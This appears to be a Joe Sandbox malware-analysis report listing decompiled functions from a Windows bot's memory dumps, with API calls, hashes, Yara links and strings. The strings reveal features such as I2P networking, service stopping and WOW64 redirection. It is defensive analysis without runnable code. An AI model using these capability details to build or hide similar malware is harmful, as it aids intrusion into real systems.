Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd

Similarity

API ID: Virtual$ErrorLastProtectQuery
String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
API String ID: 637304234-2123141913
Opcode ID: ea9c6495ba8c563decb4ca833a9109ca8136e51b28a442f802252e464f489548
Instruction ID: 3479f7c207f019457ff450507b48390c1860d7fef55bca0879293208951140e9
Opcode Fuzzy Hash: ea9c6495ba8c563decb4ca833a9109ca8136e51b28a442f802252e464f489548
Instruction Fuzzy Hash: 7431A271B09E428DEA008F17E8416AD2761EF69BA4F448275DE6D2B7B5DE3CE446C308

Function 00007FFE11509428 Relevance: 10.6, APIs: 2, Strings: 5, Instructions: 85stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 00007FFE115094F9
strcpy.MSVCRT ref: 00007FFE11509526

Part of subcall function 00007FFE115090CA: strlen.MSVCRT ref: 00007FFE11509177
Part of subcall function 00007FFE115090CA: GetProcessHeap.KERNEL32 ref: 00007FFE1150919A
Part of subcall function 00007FFE115090CA: HeapFree.KERNEL32 ref: 00007FFE115091AB

Part of subcall function 00007FFE11508B20: strcmp.MSVCRT ref: 00007FFE11508B5B
Part of subcall function 00007FFE11508B20: strcmp.MSVCRT ref: 00007FFE11508B73
Part of subcall function 00007FFE11508B20: strcmp.MSVCRT ref: 00007FFE11508BA6
Part of subcall function 00007FFE11508B20: strcmp.MSVCRT ref: 00007FFE11508BC7

Strings

VALUE, xrefs: 00007FFE115094DD
NAMING, xrefs: 00007FFE115094A0
NAMING LOOKUP NAME=%s, xrefs: 00007FFE11509461
REPLY, xrefs: 00007FFE11509499
RESULT, xrefs: 00007FFE11509492, 00007FFE115094CB

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: strcmp$Heap$FreeProcessstrcpystrlen
String ID: NAMING$NAMING LOOKUP NAME=%s$REPLY$RESULT$VALUE
API String ID: 4033962467-581645075
Opcode ID: d82c7a298056fb6de1b2f0056544940b41cea02410fd72c23628b14edce4f0b3
Instruction ID: 45ed08559c54dea620bc2f242c7f9e30e15e8fb91f57d95dd52b2705af4a98ef
Opcode Fuzzy Hash: d82c7a298056fb6de1b2f0056544940b41cea02410fd72c23628b14edce4f0b3
Instruction Fuzzy Hash: 83316652A0DE4345FB2596AB98102BD126E6F413B4F6903B5DD3D0B3F9FE2DE5028340

Function 00007FFE133058A9 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 66COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32 ref: 00007FFE133058B2
GetLastError.KERNEL32 ref: 00007FFE133058F7

Strings

fs_path_exists, xrefs: 00007FFE133058DD
(path != NULL), xrefs: 00007FFE133058D6
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE133058E4
H:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FFE133058CF

Memory Dump Source

Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd

Similarity

API ID: AttributesErrorFileLast
String ID: (path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_path_exists
API String ID: 1799206407-1112464793
Opcode ID: b250dac3c5079807c9d67ca754ccbdb42e9ed6e9e2d20b42dc24d35b26cf52f9
Instruction ID: 45a6da15fce51882198cf6b5a054061e7e0c502d83324e6a2291a4c444a289d9
Opcode Fuzzy Hash: b250dac3c5079807c9d67ca754ccbdb42e9ed6e9e2d20b42dc24d35b26cf52f9
Instruction Fuzzy Hash: 8521BA54F0CE8BCAFB60565A948437C56809F20336F2449B2D5BFE91F5CE2CEC85560A

Function 00007FFE11501770 Relevance: 10.5, APIs: 1, Strings: 5, Instructions: 42COMMON

Download Yara Rule

APIs

inet_addr.WS2_32 ref: 00007FFE11501782

Strings

[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE115017D7, 00007FFE11501807
(s != NULL), xrefs: 00007FFE115017C9
ip4_from_str, xrefs: 00007FFE115017D0, 00007FFE11501800
H:/Projects/rdp/bot/codebase/net.c, xrefs: 00007FFE115017C2, 00007FFE115017F2
(v != NULL), xrefs: 00007FFE115017F9

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: inet_addr
String ID: (s != NULL)$(v != NULL)$H:/Projects/rdp/bot/codebase/net.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$ip4_from_str
API String ID: 1393076350-2916536452
Opcode ID: 74e4e199fd59fe66a48ec781d56a45989c4e58514d9d210b782fc1033c8132ae
Instruction ID: bd9be68cba4fcc3b2b77c9326b258dfca131a82c6f86cde6073709b5648badf3
Opcode Fuzzy Hash: 74e4e199fd59fe66a48ec781d56a45989c4e58514d9d210b782fc1033c8132ae
Instruction Fuzzy Hash: 521182E4A08D0792FB119BA6E4803BC3BAABF50328F4455B5D91E8B1F4DF3DE9458301

Function 00007FFE13301290 Relevance: 10.5, APIs: 1, Strings: 5, Instructions: 42COMMON

Download Yara Rule

APIs

inet_addr.WS2_32 ref: 00007FFE133012A2

Strings

H:/Projects/rdp/bot/codebase/net.c, xrefs: 00007FFE133012E2, 00007FFE13301312
(s != NULL), xrefs: 00007FFE133012E9
(v != NULL), xrefs: 00007FFE13301319
ip4_from_str, xrefs: 00007FFE133012F0, 00007FFE13301320
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE133012F7, 00007FFE13301327

Memory Dump Source

Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd

Similarity

API ID: inet_addr
String ID: (s != NULL)$(v != NULL)$H:/Projects/rdp/bot/codebase/net.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$ip4_from_str
API String ID: 1393076350-2916536452
Opcode ID: 3eb9f545268111e300f5b7aa64c495c7c6dbc01067e67b233289fcffbe879363
Instruction ID: 6300ca95b963178236c7dbab3901b7b63a082a8d5c4060372b6f0b74b922afd2
Opcode Fuzzy Hash: 3eb9f545268111e300f5b7aa64c495c7c6dbc01067e67b233289fcffbe879363
Instruction Fuzzy Hash: 511170A4E08D0BCAFB019B62E8003F86255AF34328F4441B2D57DAA1B2DF3DA8459308

Function 00007FFE1150525C Relevance: 10.5, APIs: 1, Strings: 6, Instructions: 39COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE115044A4: LoadLibraryA.KERNEL32 ref: 00007FFE115044B2

GetLastError.KERNEL32 ref: 00007FFE115052D8

Part of subcall function 00007FFE11504423: GetProcAddress.KERNEL32 ref: 00007FFE11504443

Strings

fs_wow_redir_revert, xrefs: 00007FFE115052BB, 00007FFE115052E1
[E] (%s) -> Wow64RevertWow64FsRedirection failed(gle=%lu), xrefs: 00007FFE115052E8
Done, xrefs: 00007FFE115052B4
kernel32, xrefs: 00007FFE11505269
Wow64RevertWow64FsRedirection, xrefs: 00007FFE1150527D
[I] (%s) -> %s, xrefs: 00007FFE115052C2

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: AddressErrorLastLibraryLoadProc
String ID: Done$Wow64RevertWow64FsRedirection$[E] (%s) -> Wow64RevertWow64FsRedirection failed(gle=%lu)$[I] (%s) -> %s$fs_wow_redir_revert$kernel32
API String ID: 3511525774-1584720945
Opcode ID: 4f2ecd864c71f42e00856e3e521dde8d760e99c0cb8ee026b08ac7068f9b0c9b
Instruction ID: a3c8bc6f0810b96f552f189a0ab0e60534b89b0e2a3752c20fa2a9ec42b0d681
Opcode Fuzzy Hash: 4f2ecd864c71f42e00856e3e521dde8d760e99c0cb8ee026b08ac7068f9b0c9b
Instruction Fuzzy Hash: A611C960E2DE4391FB12AB97E8543B8225A6F51328F9800FAE40D862B1FF6CE944C341

Function 00007FFE13302C9C Relevance: 10.5, APIs: 1, Strings: 6, Instructions: 39COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE13307474: LoadLibraryA.KERNEL32 ref: 00007FFE13307482

GetLastError.KERNEL32 ref: 00007FFE13302D18

Part of subcall function 00007FFE133073F3: GetProcAddress.KERNEL32 ref: 00007FFE13307413

Strings

Wow64RevertWow64FsRedirection, xrefs: 00007FFE13302CBD
[E] (%s) -> Wow64RevertWow64FsRedirection failed(gle=%lu), xrefs: 00007FFE13302D28
fs_wow_redir_revert, xrefs: 00007FFE13302CFB, 00007FFE13302D21
Done, xrefs: 00007FFE13302CF4
kernel32, xrefs: 00007FFE13302CA9
[I] (%s) -> %s, xrefs: 00007FFE13302D02

Memory Dump Source

Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd

Similarity

API ID: AddressErrorLastLibraryLoadProc
String ID: Done$Wow64RevertWow64FsRedirection$[E] (%s) -> Wow64RevertWow64FsRedirection failed(gle=%lu)$[I] (%s) -> %s$fs_wow_redir_revert$kernel32
API String ID: 3511525774-1584720945
Opcode ID: dd2d016bc414a8fbd275c16850b5fd45635f63f7c4028b960cc0e3c20d977c37
Instruction ID: 9ba339b6e8bc952cf6b9cae47b4541bde2a813b4eae4a8deef18cf1965e9127b
Opcode Fuzzy Hash: dd2d016bc414a8fbd275c16850b5fd45635f63f7c4028b960cc0e3c20d977c37
Instruction Fuzzy Hash: EB11F760F1DE43DCFA14971BA8513B862516F34364F9401F2E43DAA2B2EE6CE945C30C

Function 00007FFE0EB442FE Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 38serviceCOMMON

Download Yara Rule

APIs

CloseServiceHandle.ADVAPI32 ref: 00007FFE0EB44616
OpenServiceA.ADVAPI32 ref: 00007FFE0EB44634
ControlService.ADVAPI32 ref: 00007FFE0EB44653
GetLastError.KERNEL32 ref: 00007FFE0EB44661

Strings

[E] (%s) -> ControlService(SERVICE_CONTROL_STOP) failed(lpServiceName=%s,gle=%lu), xrefs: 00007FFE0EB44682
scm_stop, xrefs: 00007FFE0EB4467B

Memory Dump Source

Source File: 00000014.00000002.2559615479.00007FFE0EB41000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFE0EB40000, based on PE: true

Associated: 00000014.00000002.2559600601.00007FFE0EB40000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559637544.00007FFE0EB56000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559653233.00007FFE0EB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559668361.00007FFE0EB63000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559683911.00007FFE0EB64000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0eb40000_main.jbxd

Similarity

API ID: Service$CloseControlErrorHandleLastOpen
String ID: [E] (%s) -> ControlService(SERVICE_CONTROL_STOP) failed(lpServiceName=%s,gle=%lu)$scm_stop
API String ID: 3311966420-638458398
Opcode ID: e8deac39b554ca3a5095b21f90a19be0419249a2b92e6be53a90add666cfc3cc
Instruction ID: b899158e24d9f10d5ea9500cd9b2daa364a0fefe6eefa4c43b8b69d14281b1e7
Opcode Fuzzy Hash: e8deac39b554ca3a5095b21f90a19be0419249a2b92e6be53a90add666cfc3cc
Instruction Fuzzy Hash: E40148A1B09B5391FA319F55E84437927A0FF55B88F445036DA9E473B0EE2CE454CB00

Function 00007FFE0EB44308 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 38serviceCOMMON

Download Yara Rule

APIs

CloseServiceHandle.ADVAPI32 ref: 00007FFE0EB44616
OpenServiceA.ADVAPI32 ref: 00007FFE0EB44634
ControlService.ADVAPI32 ref: 00007FFE0EB44653
GetLastError.KERNEL32 ref: 00007FFE0EB44661

Strings

[E] (%s) -> ControlService(SERVICE_CONTROL_STOP) failed(lpServiceName=%s,gle=%lu), xrefs: 00007FFE0EB44682
scm_stop, xrefs: 00007FFE0EB4467B

Memory Dump Source

Source File: 00000014.00000002.2559615479.00007FFE0EB41000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFE0EB40000, based on PE: true

Associated: 00000014.00000002.2559600601.00007FFE0EB40000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559637544.00007FFE0EB56000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559653233.00007FFE0EB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559668361.00007FFE0EB63000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559683911.00007FFE0EB64000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0eb40000_main.jbxd

Similarity

API ID: Service$CloseControlErrorHandleLastOpen
String ID: [E] (%s) -> ControlService(SERVICE_CONTROL_STOP) failed(lpServiceName=%s,gle=%lu)$scm_stop
API String ID: 3311966420-638458398
Opcode ID: 11842d34c38b544ad540f12ef98594c8cd76dd3e3870d5edc4c0624947a150da
Instruction ID: 5eece2d407fe10edae7eb548018431f4bd4dcb164ff59237ed0a55693f800a11
Opcode Fuzzy Hash: 11842d34c38b544ad540f12ef98594c8cd76dd3e3870d5edc4c0624947a150da
Instruction Fuzzy Hash: 460148A1B09B5391FA319F55E84437927A0FF55B89F445036DA9E473B0EE2CE454CB00

Function 00007FFE115051C0 Relevance: 10.5, APIs: 1, Strings: 6, Instructions: 34COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE115044A4: LoadLibraryA.KERNEL32 ref: 00007FFE115044B2

Part of subcall function 00007FFE11504423: GetProcAddress.KERNEL32 ref: 00007FFE11504443

GetLastError.KERNEL32 ref: 00007FFE11505220

Part of subcall function 00007FFE11501292: fwrite.MSVCRT ref: 00007FFE1150133E
Part of subcall function 00007FFE11501292: fflush.MSVCRT ref: 00007FFE1150134A

Strings

Done, xrefs: 00007FFE115051FC
fs_wow_redir_disable, xrefs: 00007FFE11505203, 00007FFE11505229
kernel32, xrefs: 00007FFE115051C4
[E] (%s) -> Wow64DisableWow64FsRedirection failed(gle=%lu), xrefs: 00007FFE11505230
Wow64DisableWow64FsRedirection, xrefs: 00007FFE115051D8
[I] (%s) -> %s, xrefs: 00007FFE1150520A

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: AddressErrorLastLibraryLoadProcfflushfwrite
String ID: Done$Wow64DisableWow64FsRedirection$[E] (%s) -> Wow64DisableWow64FsRedirection failed(gle=%lu)$[I] (%s) -> %s$fs_wow_redir_disable$kernel32
API String ID: 1533789296-1853374401
Opcode ID: c0369e687f8a829efbc8b28538350eeb01608e2c039c8ba3332f0e6600f61d84
Instruction ID: a8d6bc885010f173095d7926e6984aa11e8c95df7d1f0bfa8d69b9bb6b50a441
Opcode Fuzzy Hash: c0369e687f8a829efbc8b28538350eeb01608e2c039c8ba3332f0e6600f61d84
Instruction Fuzzy Hash: 8C01D260E2DD4395FB129797E8543BC235E6F51328F9841F6D40E862B1EF7CE9458301

Function 00007FFE13302C00 Relevance: 10.5, APIs: 1, Strings: 6, Instructions: 34COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE13307474: LoadLibraryA.KERNEL32 ref: 00007FFE13307482

Part of subcall function 00007FFE133073F3: GetProcAddress.KERNEL32 ref: 00007FFE13307413

GetLastError.KERNEL32 ref: 00007FFE13302C60

Part of subcall function 00007FFE1330A202: fwrite.MSVCRT ref: 00007FFE1330A2AE
Part of subcall function 00007FFE1330A202: fflush.MSVCRT ref: 00007FFE1330A2BA

Strings

fs_wow_redir_disable, xrefs: 00007FFE13302C43, 00007FFE13302C69
Wow64DisableWow64FsRedirection, xrefs: 00007FFE13302C18
Done, xrefs: 00007FFE13302C3C
kernel32, xrefs: 00007FFE13302C04
[I] (%s) -> %s, xrefs: 00007FFE13302C4A
[E] (%s) -> Wow64DisableWow64FsRedirection failed(gle=%lu), xrefs: 00007FFE13302C70

Memory Dump Source

Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd

Similarity

API ID: AddressErrorLastLibraryLoadProcfflushfwrite
String ID: Done$Wow64DisableWow64FsRedirection$[E] (%s) -> Wow64DisableWow64FsRedirection failed(gle=%lu)$[I] (%s) -> %s$fs_wow_redir_disable$kernel32
API String ID: 1533789296-1853374401
Opcode ID: 199b7c4e193ab412065d3af7039d3c2ec05d4ab750b84b281bb691d22d678d33
Instruction ID: f535040f58045a09f0e0152d4beade37af07c1f08538d9bfa213254de62638d5
Opcode Fuzzy Hash: 199b7c4e193ab412065d3af7039d3c2ec05d4ab750b84b281bb691d22d678d33
Instruction Fuzzy Hash: 4101ED60B0CE47DCFA10D717E8513B866516F34364F8400F2D43EA52B6DE6DE946831C

Function 00007FFE11508A8D Relevance: 10.5, APIs: 1, Strings: 5, Instructions: 28COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE11504423: GetProcAddress.KERNEL32 ref: 00007FFE11504443

FreeLibrary.KERNEL32 ref: 00007FFE11508AD5

Strings

C_TerminateI2P, xrefs: 00007FFE11508AB4
i2p_cleanup, xrefs: 00007FFE11508AED
C_StopI2P, xrefs: 00007FFE11508A9E
Done, xrefs: 00007FFE11508AE6
[I] (%s) -> %s, xrefs: 00007FFE11508AF4

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: C_StopI2P$C_TerminateI2P$Done$[I] (%s) -> %s$i2p_cleanup
API String ID: 3013587201-3114442857
Opcode ID: 3fcda33e0bcb24fe2b0e0be5400163abc4aa4804fdeba9f388e3eac77f141408
Instruction ID: ce60b112a2f03631fcc62f4c659b4be6e0b954eeb517719142c53b2ba2082537
Opcode Fuzzy Hash: 3fcda33e0bcb24fe2b0e0be5400163abc4aa4804fdeba9f388e3eac77f141408
Instruction Fuzzy Hash: 11F0FF50E1AE0391FF46ABABE8447BC236AAF443B4F4950B5C80D86271AF6CE549C310

Function 00007FFE1150A2C4 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 28synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32 ref: 00007FFE1150A2E4
CloseHandle.KERNEL32 ref: 00007FFE1150A2F1

Part of subcall function 00007FFE11509EE7: EnterCriticalSection.KERNEL32 ref: 00007FFE11509F1F
Part of subcall function 00007FFE11509EE7: GetProcessHeap.KERNEL32 ref: 00007FFE11509F7B
Part of subcall function 00007FFE11509EE7: HeapFree.KERNEL32 ref: 00007FFE11509F8C
Part of subcall function 00007FFE11509EE7: LeaveCriticalSection.KERNEL32 ref: 00007FFE11509FAF

DeleteCriticalSection.KERNEL32 ref: 00007FFE1150A31F

Strings

[I] (%s) -> %s, xrefs: 00007FFE1150A349
Done, xrefs: 00007FFE1150A33B
ebus_cleanup, xrefs: 00007FFE1150A342

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: CriticalSection$Heap$CloseDeleteEnterFreeHandleLeaveObjectProcessSingleWait
String ID: Done$[I] (%s) -> %s$ebus_cleanup
API String ID: 3198640931-3713968270
Opcode ID: f93e207e0bbcc97885a442e08f10a3ec1dec0c0acac52272c6c7fbf95795af8d
Instruction ID: 62783b48a63b349fdcb0a18e27aff3212e2072acfff611d673f59611dd5e9977
Opcode Fuzzy Hash: f93e207e0bbcc97885a442e08f10a3ec1dec0c0acac52272c6c7fbf95795af8d
Instruction Fuzzy Hash: 2E01A220A09E4385FB51AB57E898378236AAF40B38F5053B9C43E462F1DF6DA846C301

Function 00007FFE1150100C Relevance: 9.1, APIs: 6, Instructions: 101sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(?,00000000,00007FFE11513964,00007FFE11501240), ref: 00007FFE1150107F
_amsg_exit.MSVCRT(?,00000000,00007FFE11513964,00007FFE11501240), ref: 00007FFE115010A1
_initterm.MSVCRT ref: 00007FFE115010DB
Sleep.KERNEL32(?,00000000,00007FFE11513964,00007FFE11501240), ref: 00007FFE11501132
_amsg_exit.MSVCRT(?,00000000,00007FFE11513964,00007FFE11501240), ref: 00007FFE11501149

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
